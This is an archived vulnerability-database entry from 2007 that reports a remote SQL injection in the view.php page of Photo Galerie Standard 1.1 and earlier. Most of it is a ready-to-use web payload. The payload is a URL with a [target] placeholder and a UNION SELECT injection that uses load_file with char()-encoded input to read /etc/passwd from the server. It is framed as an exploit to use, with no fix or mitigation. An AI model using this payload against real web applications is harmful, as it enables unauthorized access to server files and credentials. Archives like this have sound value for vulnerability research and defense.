Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

2007-02-03T00:00:00
ID SECURITYVULNS:DOC:15957
Type securityvulns
Reporter Securityvulns
Modified 2007-02-03T00:00:00

Description


Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://noname-media.com

$$ : Free


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//view.php?id=[SQL]

Example:

etc/passwd Read

//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

...

Im not Hacker!